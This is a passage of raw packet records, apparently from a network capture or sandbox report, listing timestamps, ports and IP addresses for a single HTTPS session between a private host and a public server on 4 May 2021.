May 4, 2021 12:32:26.996156931 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.996176004 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.996213913 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.996238947 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.997246981 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.997272968 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.997299910 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.997344971 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.998276949 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.998280048 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.998333931 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.998363018 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.999325037 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.999330997 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.999397039 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.000294924 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.000323057 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.000369072 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.000395060 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.001265049 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.001292944 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.001343966 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.001368999 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.002175093 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.002196074 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.002257109 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.003094912 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.003117085 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.003155947 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.003184080 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.004000902 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.004024029 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.004079103 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.004101038 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.004914045 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.004940033 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.005002022 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.005063057 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.005803108 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.005825996 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.005856991 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.005878925 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.006659031 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.006680965 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.006715059 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.006742001 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.007520914 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.007544041 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.007591963 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.007649899 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.008399010 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.008405924 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.008471966 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.009217024 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.009238958 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.009293079 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.010102987 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.010127068 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.010159969 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.010206938 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.010931015 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.010951996 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.010996103 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.011027098 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.011806965 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.011832952 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.011866093 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.011888981 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.012655020 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.012660980 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.012726068 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.013609886 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.013626099 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.013662100 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.013705015 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.014380932 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.014396906 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.014472961 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.014492989 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.015219927 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.015261889 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.015280008 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.015321970 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.016081095 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.016099930 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.016141891 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.016168118 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.017040968 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.017055988 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.017122030 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.017143011 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.017801046 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.017821074 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.017868996 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.017885923 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.018640995 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.018660069 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.018704891 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.018727064 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.019516945 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.019536972 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.019577980 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.019604921 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.020386934 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.020406008 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.020443916 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.020469904 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.021245956 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.021265984 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.021322966 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.022083044 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.022104025 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.022145033 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.022178888 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.022975922 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.022991896 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.023046017 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.023089886 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.023802042 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.023821115 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.023972988 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.024703979 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.024709940 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.024779081 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.025295019 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.025321007 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.025336981 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.025362968 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.025396109 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.026134014 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.026158094 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.026175976 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.026209116 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.026230097 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.027056932 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.027081013 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.027101040 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.027139902 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.027184963 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.027935028 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.027959108 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.027976036 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.028000116 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.028022051 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.028839111 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.028861046 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.028877974 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.028908014 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.028929949 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.029719114 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.029722929 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.029731035 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.029910088 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.030571938 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.030597925 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.030611038 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.030705929 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.031449080 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.031476974 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.031493902 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.031558990 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.032324076 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.032347918 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.032360077 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.032428980 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.033199072 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.033212900 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.033232927 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.033318996 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.034074068 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.034096003 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.034111023 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.034145117 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.034190893 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.034960032 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.034985065 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.035001993 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.035043001 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.035073996 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.035854101 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.035877943 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.035901070 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.035926104 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.035979033 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.036731958 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.036756992 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.036775112 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.036793947 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.036838055 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.037610054 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.037635088 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.037652016 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.037669897 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.037719011 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.038496017 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.038521051 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.038537025 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.038559914 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.038634062 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.039356947 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.039383888 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.039397001 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.039438009 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.039484024 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.040237904 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.040260077 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.040280104 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.040313005 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.040348053 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.041102886 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.041126013 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.041141987 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.041169882 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.041222095 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.041973114 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.041999102 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.042015076 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.042028904 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.042057991 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.042082071 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.042826891 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.042850018 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.042865038 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.042881966 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.042938948 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.043699980 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.043721914 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.043737888 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.043755054 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.043786049 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.044559956 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.044583082 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.044608116 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.044634104 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.044684887 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.045428991 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.045450926 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.045468092 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.045480013 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.045540094 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.046291113 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.046313047 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.046324968 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.046339035 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.046401978 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.047142029 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.047173977 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.047188997 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.047202110 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.047244072 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.047250986 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.048008919 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.048031092 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.048049927 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.048083067 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.048115015 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.048861027 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.048891068 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.048896074 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.048934937 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.048990011 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.049721956 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.049743891 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.049760103 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.049777985 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.049818039 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.049823046 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.050559044 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.050585032 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.050604105 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.050631046 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.050668955 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.051419973 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.051450968 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.051460028 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.051466942 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.051538944 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.052229881 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.052249908 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.052265882 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.052280903 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.052295923 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.052333117 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.053083897 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.053103924 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.053119898 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.053131104 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.053149939 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.053173065 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.053905964 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.053924084 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.053940058 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.053980112 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.054013968 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.054517984 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.054773092 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.054794073 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.054811001 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.054821014 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.054836988 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.054860115 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.055608034 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.055629015 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.055645943 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.055655956 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.055686951 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.056579113 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.056595087 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.056610107 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.056844950 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.056864023 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.057527065 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.057543993 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.057559967 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.057580948 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.057599068 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.058110952 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.058135986 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.058154106 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.058166981 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.058197975 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.058924913 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.058944941 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.058960915 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.058990002 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.059005022 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.059726954 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.059748888 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.059772968 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.059778929 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.059827089 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.059859037 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.060503006 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.060519934 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.060554028 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.060566902 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.060587883 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.060620070 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.061317921 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.061338902 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.061355114 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.061399937 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.061414957 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.062236071 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.062253952 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.062269926 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.062304974 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.062351942 CEST	49740	443	192.168.2.4	162.159.134.233
